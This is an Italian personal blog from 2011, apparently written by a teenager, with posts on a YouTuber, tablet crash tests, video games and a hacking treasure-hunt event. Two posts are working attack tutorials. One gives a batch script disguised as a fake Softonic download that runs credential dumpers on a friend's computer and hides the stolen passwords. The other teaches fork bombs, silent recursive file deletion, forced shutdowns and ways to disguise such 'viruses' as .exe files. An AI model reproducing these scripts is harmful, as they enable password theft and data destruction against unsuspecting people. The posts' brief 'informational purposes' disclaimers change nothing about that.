sabato 30 luglio 2011

Daniele Doesn't Matter, un mito del web

Per chi non lo conoscesse Daniele Doesn't Matter è uno dei più famosi youtubers presenti sulla rete.

Ha spopolato in internet con i suoi video comici, ciascuno dei quali tratta con ironia un differente argomento, rappresentandolo nella vita reale con divertenti rappresentazioni. Nei suoi video inserisce anche, attraverso giochi di parole, o come esempi, alcuni dei numerosissimi filmati trash presenti su you tube, che si alternano alla trama vera e propria della storia.

Con il tempo Daniele ha inserito nei suoi video pesonaggi che ravvivano la trama della storia come: TU che rappresenta l'utente medio di internet, TU DONNA, come il precedente ma in versione femminile, e altri personaggi come TU NONNO, Il Dott.Gianfranco Franco Franchini, e ovviamente Freddy. (Qui sotto)

All'inizio di ogni video c'è, dopo il saluto di Daniele, la sigla dei suoi video, anch'essa fatta molto bene. In ogni puntata Daniele inserisce una domanda sua o di un suo fan, per ricevere la risposta dagli altri utenti e inserirla nel video successivo (parliamo di domande del genere "Perchè i bambini fanno oh?"). Il video finisce con i suoi saluti e le foto dei fans.

Personalmente io ho visto il suo primo video circa un anno fa, non ne ho ancora perso nemmeno uno. Questo, anche grazie al fatto che, come pochissimi youtubers fanno, Daniele pubblica i suoi video settimanalmente ogni venerdì.

Questi sono i canali you tube di Daniele:
1° Canale Doesn't Matter Podcast
2° Canale Doesn't Matter Vlog
3° Canale Doesn't Matter Mobile

Non vi pubblico un video perchè non avrei idea di quale mettere quindi andate nel podcast e fatevi guidare dal destino...

Ipad 2 vs Galaxy Tab vs Xoom: Sfida crash test


iPad 2 vs. Galaxy Tab vs. Xoom: il piacere della sfida


Bisogna ammetterlo: si prova una strano brivido di piacere ad osservere esplosioni, demolizioni e simili, soprattutto quando sapete che è fatto solo per divertimento. Ma non è così divertente quando si fa cadere il vostro tablet da 600€. Sopravviverà o avrete perso tutti i vostri soldi e vi ritroverete senza un tablet fino alla prossima riparazione o sostituzione?


Già nel mese di giugno SquareTrade (una delle diverse società che vende assicurazioni per i dispositivi mobile, ragion per cui ha tutto l’interesse nel capire che tipo rischi corre quando offre assicurazioni su questi dispositivi) aveva girato due video crash test che mostravano come un iPad 2, con e senza Smart Cover, e un BlackBerry PlayBook se la cavassero in caso di caduta da altezza diverse. Se l’iPad 2 con Smart Cover riusciva a resistere abbastanza bene, altrettanto non si può dire del tablet Apple senza custodia protettiva e del PlayBook, che uscivano in condizioni davvero pessime.

iPad 2 vs. Galaxy Tab vs. Xoom: SquareTrade dà il via alla sfida (in video)

Ora SquareTrade ha fatto nuovi crash test da alcune altezza diverse per verificare la solidità dei due principali tablet Android, il Samsung Galaxy Tab 10.1 e il Motorola Mobile Xoom, e ha riprovato i test anche un iPad 2 senza Smart Cover. Potete vedere voi stessi i risultati nel video qui sotto.



iPad 2 vs. Galaxy Tab vs. Xoom: risultati del crash test

Lo schermo dell’iPad 2 senza una Smart Cover si infrange, anche se il tablet continua a funzionare. Ricordiamo invece che un iPad 2 protetto da una Smart Cover sopravvive intatto e l’iPad continua a funzionare in ogni caso.

Il Motorola Xoom riporta un danno ancora peggiore dell’iPad 2 al crash test, probabilmente a causa del suo peso maggiore.

Ma il Galaxy Tab 10.1 subisce un danno minimo alla caduta. Anche se il suo peso, lo spessore e le dimensioni sono più o meno simili a quelle dell’iPad, la sua struttura reagisce meglio alla caduta.

Cosa significa tutto ciò? Innanizitutto che anche voi siete affascinati dai crash test se siete arrivati fin qui. Due, il Galaxy Tab 10.1 (o un iPad 2 dotato di Smart Cover) è la scelta migliore per gli acquirenti di tablet dalla dita di burro.
iPad 2 vs. Galaxy Tab vs. Xoom: vince il tablet Samsung

lunedì 25 luglio 2011

Mother: A Computer Hacking Simulation

Se siete appassionati di hacking, ma non avete intenzione di infrangere in alcun modo la legge entrando realmente in un computer altrui, allora vi consiglio questo bellissimo gioco, che simula un nuovo sistema operativo, Mother.

All'interno del gioco dovrete svolgere le più svariate missioni di hacking per conto dell'associazione di cui fate parte, l'Underground, un gruppo di hacker che lottano per ottenere la libertà e la sicurezza della rete. Vi ritroverete a dover cancellare dati dagli archivi dell'Intrapol, una specie di FBI informatica, ad abbattere server, e molto altro ancora.

La piattaforma è molto coinvolgente, all'interno del sistema operativo del gioco avrete a disposizione alcuni software per l'utilizzo più svariato, per ascoltare la vostra musica caricandola nel gioco, per prendere appunti, per craccare passwords, per fare upload di dati nei server ecc... Tutto il gioco, (o quasi) è giocabile in modalità grafica, ma per i più smanettoni tra di voi, sarà anche possibile giocarlo utilizzando la console del sistema operativo.

Sono presenti due aggiornamenti del gioco, e alcune patch contenenti nuovi software, nuove missioni ecc... tutto questo lo potete trovare sul sito ufficiale di Mother nell'area download.

Buon divertimento!

sabato 23 luglio 2011

Tom Clancy's Ghost Recon: Future Soldier

Il nuovo titolo, ispirato ad un'opera di Tom Clancy, realizzato dalla Ubisoft dopo una presentazione con tanto
di trailer e gameplay, ha subito il destino di essere bloccato e nascosto dai realizzatori con la semplice scusa "Ci stiamo lavorando".

Il ritorno in pista del gioco però ha riscosso un gran successo, tanto da potersi permettere di dimenticare lo sfortunato debutto del gioco.

Per la prima volta il nuovo gioco marcato Ubisoft è stato giocato in live sul megaschermo del Los Angeles Theathre, rivelando una demo più che corposa che vedeva il nostro gruppo di soldati impegnati in una missione di recupero di un ostaggio ambientata in Nigeria. Non appena arrivati al primo manipolo di nemici, si è potuto apprezzare le notevoli qualità dell'interfaccia di gioco, che unisce indicatori olografici che ricordano quelli visti in Dead Space con informazioni sugli obiettivi della missione che diventano parte integrante dello scenario. L'impatto che si ha sul gioco è davvero notevole, gli sviluppatori nell'intento di creare un futurisco e realistico visore tattico hanno svolto un ottimo lavoro.

La Ubisoft ha deciso di reinserire lo stealth camouflage stile Predator, ma ridimensionandole l'importanza, infatti, l'importanza del gameplay è incentrata sul lavoro di squadra, che permette di elaborare tattiche sempre più sofisticate. L'iniziale manciata di nemici è stata infatti neutralizzata con dei precisi colpi sparati all'unisono dai quattro membri del team Ghost, un lavoro pulito e silenzioso preceduto dall'immancabile assegnazione degli obiettivi: la linea di fuoco di ognuno dei soldati del gruppo veniva in questo ambito segnalata da un fascio di luce azzurra, in modo da far capire immediatamente quali nemici sarebbero stati abbattuti dai propri compagni. Il tempo di eseguire un'uccisione stealth corpo a corpo e di avvicinarsi ad un'abitazione ed ecco la sorpresa: le luci del teatro si sono accese su tre postazioni aggiuntive a quella principale, dimostrando come la demo venisse giocata da quattro utenti in cooperativa.

Detto fatto ed il megaschermo si è ripartito in altrettanti quadranti che mostravano la visuale di ognuno degli addetti Ubisoft impegnati nella dimostrazione, i quali si sono lanciati in una spettacolare breccia dell'edificio entrando da due ingressi diversi. Lecito dunque pensare che la modalità multiplayer sarà un notevole valore aggiunto della produzione, come ha dimostrato il successivo ed ultimo spezzone di gameplay, con l'azione che nel frattempo si era spostata ad una raffineria occupata dai terroristi. Dopo una serie di frenetiche sparatorie che hanno messo in mostra, tra le altre cose, un sistema di coperture apparentemente molto valido, i Ghost hanno raggiunto il container dove era rinchiuso l'ostaggio da portare in salvo.

Quanto mostrato dalla demo ha messo alla luce scenari di ampio respiro, ben realizzati per quel che concerne le strutture poligonali ed infarciti di proiettili, esplosioni ed effetti visivi vari che non sembravano inficiare un frame rate sempre stabile. Alla bontà dei modelli dei soldati e delle loro animazioni ci sentiamo inoltre di aggiungere il gustoso taglio registico della videocamera che segue l'azione, che non lesina in movimenti sincopati che conferiscono efficacemente l'idea di ritrovarsi su un campo di battaglia.

Il gioco uscirà nel marzo 2012.

Aggiornamento 25/08/2011

Ho trovato delle immagini riguardanti la modifica delle armi, sensazionali! Dimenticatevi Call Of Duty, ora sarà possibile creare l'arma (più di una) quasi da zero, e modificarvela in base alle vostre preferenze e alle esigenze della missione. Ecco a voi le prime immagini del web...



Ed ecco a voi un video che vi mostra tutte le caratteristiche della modifica delle armi...




E finalmente in anteprima un video tratto dal multiplayer, con la spiegazione di tutte le classi.


       
Aggiornamento 16/03/2012

La data di rilascio del gioco è stata posticipata al 25 di Maggio.

venerdì 15 luglio 2011

5° Edizione della "Cracca Al Tesoro"


Il gioco a squadre chiamerà a raccolta hacker da tutta Italia per una sfida all'ultimo byte.


Cracca Al Tesoro è una versione moderna e tecnologica della ben nota Caccia al Tesoro e richiede ai giocatori che compongono le diverse squadre di superare una serie di sfide per arrivare al premio finale.
Gli strumenti per superare le sfide sono semplici: un computer portatile, una connessione Internet wireless e molta, molta intelligenza, tenacia, pazienza e competenza tecnologica.

Si tratta infatti di "craccare", cioè di individuare e sfruttare le falle di sicurezza volutamente inserite dagli organizzatori nei server collegati ad una serie di "access point" strategicamente disposti per accedere alle indicazioni nascoste che porteranno alla tappa successiva.

Di tappa in tappa, Superando barriere sempre più complesse e articolate e individuando, gli "access point" che compongono il percorso, le squadre di "ethical hackers" giungeranno, alla fine del percorso, sino ad individuare la sfida finale, il tesoro, che dà titolo alla gara.
Così gli sfidanti dovranno dare prova di intelligenza intuitiva per individuare gli "access point", capacità tecniche per violarne le protezioni, senso di squadra per organizzare un lavoro di équipe.

E naturalmente senso goliardico per cogliere lo spirito di divertimento dell'iniziativa, serissima dal punto di vista dei contenuti, delle "regole di ingaggio" delle difficoltà tecniche, ma allegra e giovanile nel suo modo di manifestarsi e di svolgersi.

Cracca Al Tesoro è infatti una manifestazione nata per avvicinare il grande pubblico dei non addetti ai lavori alla cultura della sicurezza ed all'utilizzo corretto delle moderne tecnologie che possono portare, se non gestite correttamente, a problemi come furto di identità e sottrazione di informazioni.

Il tema è di stretta attualità e Cracca Al Tesoro ha ricevuto il supporto ed il patrocinio di prestigiose organizzazioni oltre che della Regione Umbria e del Comune di Orvieto.

 In palio per i vincitori apparecchiature e gadget tecnologici, magliette e la soddisfazione di avere sfidato gli esperti più qualificati che hanno creato le "barriere" da superare.

Dietro a questo "hacking game" c'è una Squadra di Super esperti in sicurezza tecnologica che anche quest'anno hanno reso possibile CAT: @Mediaservice con le competenze di sicurezza, Alba con "uomini pronti a tutto", Studio Giardini con la gestione organizzativa e SonicWALL con il suo wifi sicuro, costituiranno una vera e propria "situation-room", un centro di controllo dove non solo saranno definite le barriere tecnologiche da "hackerare", ma verranno anche tenuti sotto controllo i movimenti di tutte le squadre.

Tutto si svolge infatti nel più rigoroso rispetto delle regole della privacy e delle tecnologie del quartiere, senza invasione delle strutture esistenti, né pericoli tecnologici di alcun genere per i cittadini e le strutture che ospitano gli access point.

La giornata si aprirà al mattino con un convegno sul tema della sicurezza informatica con importanti ospiti per proseguire nel primo pomeriggio con il gioco vero e proprio e con la premiazione e relativa festa a fine giornata.

Programma:
 10.00 - Registrazione dei partecipanti HelpDesk e Volontari CAT (CAT's Angels
 10.30 - Saluti di benvenuto e presentazione dell'edizione CAT 2011@Security Summit da parte del Comitato Organizzatore CAT;
 10:45 - Intervento dell'assessore all'informatica del Comune di Orvieto prof. Claudio Margottini
 11.15 - Cosa è CAT, il wardriving, il problema del wifi (Paolo/Alessio)
 11.45 - Tavola rotonda: Anonymous e gli attacchi ai siti istituzionali con con Raoul Chiesa (UNICRI), Alessio Pennasilico (CLUSIT, AIPSI), Marina Latini (FSUG Italia), Ing. Yvette Agostini (security researcher), Cristiano Cafferata (SonicWall), Emanuele Gentili (BackTrack Linux International) Paolo Giardini (Direttore OPSI)
 12.45 - Discussione con il pubblico
 13.30 - Pranzo
 14.30 - Briefing e via al gioco
 19.00 - Termine del gioco, verifica dei punteggi
 19.30 - Proclamazione di vincitori, premiazione, festa finale a base di musica (DJ set Koba), vino e porchetta

Per registrarsi gratuitamente e rimanere informati, visitare il sito wardriving.

martedì 5 luglio 2011

Creare una USB-rubapassword

Ciao a tutti!

Oggi vi presenterò un simpatico programma fatto da me per rubare password dai computer dei vostri amici.

Il procedimento è semplice, vi basterà decomprimere l'archivio in una penna usb vuota e far partire il programma. Ora vi spiego in dettaglio.
Il programma di basa sulla finzione del download del programma stesso dal sito Softonic. A voi basterà dire che avete trovato un programma per usb per rubare password, il che è vero, e far credere alla vittima che il file .bat che utilizzeremo sia il downloader del programma. Durante il finto download il programma ruba tutte le password possibili, quando ha finito, il finto download dirà di aver riscontrato un errore, e ciò giustificherà l'assenza del programma scaricato, a questo punto direte che il computer non è compatibile o qualche scusa del genere. Ma ora vediamo la parte tecnica:

Questo è il testo del file .bat:

REM Collegamento a Softonic.com ...


@mspass.exe /sverhtml mspass.html
@echo Downloader.exe /sverhtml Downloader.html
@ProduKey.exe /shtml ProduKey.html
@mailpv.exe /shtml mailpv.html
@ChromePass.exe /shtml ChromePass.html

REM Inizializzazione download in corso ...

@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Data: %DATE% - Ora: %TIME% >> log.txt


@pause


REM Download in corso ...

@rar.exe a logs.rar *.html *txt log.txt > nul
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h iepv.cfg
@attrib +h logs.rar


REM Download fallito (Errore 39004256828e)


@pause





Semplice no? Vediamolo in dettaglio...

Come avete visto nel mio precedente articolo, il comando <REM> serve per inserire dei commenti, il questo modo nella shell sarà visualizzata la scritta scritta immediatamente dopo.

La @ indica che sulla shell non deve apparire niente al riguardo della stringa di codice che la segue.

Solo nel caso della seconda scritta con la @, essendo seguita da <echo>, che anche se non ho capito ancora bene come ma fa apparire ugualmente la scritta ma senza chiedere i permessi di amministratore in caso stiate usando Windows 7. Dato che quella scritta deve quindi apparire, ho deciso di rinominarla in downloader.exe, cosi sulla shell apparirà scritto downloader.exe e non creerà sospetti. In realtà quel programma è quello per le password delle reti wifi.

Il secondo blocco di codici inizianti con la @ servono per creare un file .txt con tutte le informazioni sul sistema.

Il comando <pause> serve per chiedere al'utente se si desidera continuare attraverso la pressione di un pulsante qualsiasi. Il che serve solo per rendere il programma realistico.

L'ultimo blocco di codici serve per copiare tutti i logs dei programmi per rubare la password in un archivio, a cancellare i file rimasti fuori dall'archivio e a nasconderlo.

Per ritrovare i vostri logs vi basterà aprire il percorso file e cercare il file logs.rar nella vostra chiavetta usb, è tutto là dentro.

Per rendere la chiave operativa svuotatela, copiateci l'archivio che avete scaricato ed estraetelo.
Ora mettete l'archivio in una cartella sicura o sarà cancellato automaticamente, vi consiglio di tenerne una copia nella chiave usb. Fate partire il file .bat "Download HackPass". HackPass è il finto nome del programma che sarente andati a scaricare.

Ecco la lista dei software inseriti nel programma:

mspass: serve per le password di msn
wifikeyview: serve per le password delle reti wifi
ProduKey: serve per trovare tutti i product key dei software installati nel pc della vittima
mailpv: serve per le password della varie mail
ChromePass: serve per le password memorizzate in Google Chrome

Non ho inserito quello di Firefox perchè è riconosciuto dagli antivirus, e vi farebbe scoprire, mentre per Opera non è stato ancora realizzato.
Ho ache aggiunto una miniguida nel archivio da scaricare, il file si chiama "NON ARPIRE!".

Vi ricordo che ho scritto questo articolo a scopo informativo, e non mi ritengo responsabile delle vostre azioni.

Spero di esservi stato utile che l'articolo vi sia piaciuto.

Download USB-rubapassword

Facebook, la rimonta vs Google

Facebook risponde a Google e si prepara a lanciare un nuovo servizio di chat video in collaborazione con la Microsoft.



Facebook, starebbe per lanciare un nuovo servizio di chat video in collaborazione con Skype, recentemente acquistato dalla Microsoft. Si tratterebbe della nuova funzione annunciata per il 6 luglio da Mark Zuckerberg: ma dato che nel frattempo vi è stato il positivo esordio, in beta testing, di Google+, la mossa del social network in blu sembra la risposta alla nuova iniziativa di Mountain View.
Il nuovo servizio di chat video funzionerà via browser e offrirà quella che viene descritta come una "profonda integrazione" tra Facebook e Skype e quindi un triangolo inatteso contrapposto a Google, vista la recente acquisizione del servizio VoIP da parte di Microsoft.

La sfida si giocherà dunque, oltre che in generale sulla capacità di fare "rete" del nuovo social network targato Google, sui servizi di chat video, per cui Mountain View ha già offerto una versione con conversazioni di gruppi, servizio che invece per il momento Skype limita agli utenti paganti.

Inoltre un nuovo sito, creato dagli uomini di Facebook e chiamato Circle Hack, permette tramite una funzione di drag-and-drop, una distribuzione dei propri amici Facebook simile a quella pensata per i circoli di Google+.

A supporto di quelle che sono ancora indiscrezioni, Facebook ha confermato un evento-lancio per la prossima settimana.

lunedì 4 luglio 2011

Jubbol, un nuovo modo di comunicare

Ciao a tutti!


Oggi vi parlerò di Jubbol, un nuovissimo social network nato per semplificare ed unire tutto ciò che prima potevate fare solo tramite più programmi.

Jubbol, nasce da un idea di Alessandro Mazzola, è un social network come Facebook o Twitter, non è purtroppo ancora molto popolare ma possiede numerose funzionalità che i due citati non hanno. La specialità di Jubbol è quella di poter fare online, gratuitamente ovviamente, videochiamate e conferenze, cosa che prima era possibile gratuitamente solo su Skype o siti dedicati. Non serve dire che non è necessario nessun download per questo. Sul sito inoltre sono presenti tutte le possibilità di un comune social network quali creare un profilo, aggiungere foto e video, condividere messaggi, una bacheca pubblica, giochi e molto altro...

Vi consiglio di provarlo, è ancora in fase di sviluppo quindi siate benevoli nei confronti dei piccoli bug presenti, che comunque non implicano nessun ostacolo nell'utilizzo del sito...
Il nickname di Alessando è Alex92, mentre se volete aggingere anche me io sono Nico Rizza.

Per visitare Jubbol cliccate qui.

Breve video di presentazione:


Spero l'articolo vi sia piaciuto, ciao!

domenica 3 luglio 2011

Stuxnet, il virus più pericoloso della rete

Ciao a tutti!

Oggi parleremo del virus più pericoloso della rete.

STUXNET è un worm nato per la riprogrammazione di sistemi di gestione di impianti industriali. A metà giugno 2010 la società VirusBlokAda ha segnalato la sua esistenza e l'inizio della sua progettazione è stato datato al giugno 2009. L'obbiettivo del virus potrebbero essere le centrali nucleari in costruzione in Iran. Tale virus, definito anche arma informatica, ha già contagiato oltre a numerosi computer iraniani, anche la Cina e l'Europa. Siemens ha messo a disposizione uno strumento per il rilevamento e la rimozione degli Stuxnet. Richiede inoltre agli utenti di evitare l'utilizzo di penne USB non sicure all'interno della rete anche successivamente alla rimozione del virus. Uno strumento gratuito per la rimozione di Stuxnet è messo a disposizione da BitDefender sul suo sito dedicato MalwareCity.com.

Download Source Code
Notizia su "The Hacker News"

Creare virus in batch

Ciao a tutti, oggi con il mio primo articolo desidero spiegare ai meno esperti di voi, come creare un "innoquo" virus in batch.

Allora iniziamo...

Il procedimento per creare un file batch è semplice:
- Create un documento di testo con il Blocco note
- Scriveteci il codice del vostro virus
- Fate "Salva con nome"  ----> <Nome che volete>.bat

A questo punto l'immagine del file dovrebbe essere un ingranaggio.

Impallare il pc 

Per impallare un pc aprite il file e scrivete:
start
start
start
start
start
start
...

Fatelo più volte possibile, ogni "start" aprirà una shell, quindi se volete che il pc sia impossibile da sbloccare vi consiglio di scriverlo almeno 50.000 volte, ovviamente con il copia e incolla :D. 
Un altro metodo che ho trovato consiste nel utilizzare due file che si aprono a vicenda all'infinito, e basterà scrivere start una sola volta.

Codice 1° file (1.bat):
start 2.bat
 
Codice 2° file (2.bat):
start 1.bat

Facile no? Ovviamente il nome del file deve corrispondere con il codice, ed entrambi i file devono risiedere nella stessa cartella.


Cancellare un file

Passiamo ora ad un comando più distruttivo, ovvero quello per cancellare un file:

@erase  /s /q "C:\...\...\*.*"
@del /s /q "C:\...\...\*.*"

I due comandi fanno esattamente la stessa cosa, ma analizziamoli meglio...

la "@" non visualizza il percorso del file, ossia non dice in quale cartella è presente quest'ultimo
ERASE e DEL sono i comandi che cancellano i file, mentre quelli
seguiti da "/" sono gli attributi dei comandi... Ecco un'elenco degli attributi
di questi due comandi

 /p Chiede conferma prima di eliminare ogni file.
 /f Forza l'eliminazione dei file di sola lettura.
 /s Elimina i file specificati da tutte le sottodirectory.
 /q Modalità silenziosa, non chiede conferma per eliminazioni globali.
 /a Seleziona i file da eliminare in base agli attributi.

Cosa significa il *.*?
Il primo asterisco indica che i file possono avere qualsiasi nome, mentre il secondo indica che possono avere qualsiasi formato. Se voglio cancellare tutti i file in formato txt mi basterà scrivere:

@del /s /q "C:\...\...\*.txt" 

Mi raccomando, ricordatevi le " " prima e dopo il percorso o windows non ve lo riconoscerà.

Spegnere il computer 

Il comando per spegnere il pc è shutdown, non sembra cosi pericoloso ma in certe circostanze potrebbe rivelarsi abbastanza bastardo.

shutdown  -f -t ..... -r

Il comando <-t .....> inIdica dopo quanto tempo il computer deve spegnersi. Questi sono i significati degli attributi: 

-i : attiva l’interfaccia utente grafica
-l :
effettua il logoff dell’utente.
-r :
riavvia il sistema
-s :
chiude la sessione di Windows (spegne il computer)
-t :
.... indica i secondi di attesa prima della chiusura di Windows
-f :
chiude le applicazioni ancora aperte
 

Appesantire i vostri virus

Appesantire il vostro virus è molto importante, chiunque con un po' di esperienza informatica si insospettirebbe nel vedere un file da 2kb... Il virus potrebbe essere somministrato sotto forma di un gioco, o qualcosa di simile. Per aumentare le dimensioni del vostro virus il comando è questo:

@rem ............................................................................................................

La scritta rem consiste nel creare commenti, e non influisce in nessun modo nel funzionamento del programma, per questo possiamo utilizzarlo per appesantire un file. Al posto dei ... dovete scrivere tante parole, non importa cosa, l'importante è che con copia e incolla lo copiate tante volte in modo da appesantire notevolmente il file.

Convertire da .bat in .exe  

Un file .bat, qualunque siano le dimensioni può sempre destare sospetto, per questo potrebbe essere utile convertirlo in .exe dato che la maggior parte degli eseguibili del programmi sono in questo formato. 
Un programma per la conversione è questo.  


Ho scritto questo articolo a solo scopo informativo, pertanto non mi ritengo responsabile delle vostre azioni.

FINE, spero di esservi stato utile. 



sabato 2 luglio 2011

Argomenti del blog

Gli argomenti che tratterò saranno molto vari...
Parleremo di scienza, di tecnologia, di hacking, di videogiochi, di notizie interessanti e tutto cio che vorrete, potrete farmi domande ed io (per chi ha fatto la domanda, e per tutti i lettori) mi impegnerò  a rispondere per quanto posso... mi raccomando non chiedetemi niente di storia o italiano altrimenti vi banno :D (NO SUL SERIO NON FATEMI FARE FIGURACCE xD)

Mi presento...

Ciao a tutti! Io sono Nico, ho 14 anni e vivo nelle marche. Ho creato questo blog per insegnare e per scoprire, e per conoscere nuove persone con cui fare due risate. Spero che il mio blog sarà di vostro piacimento.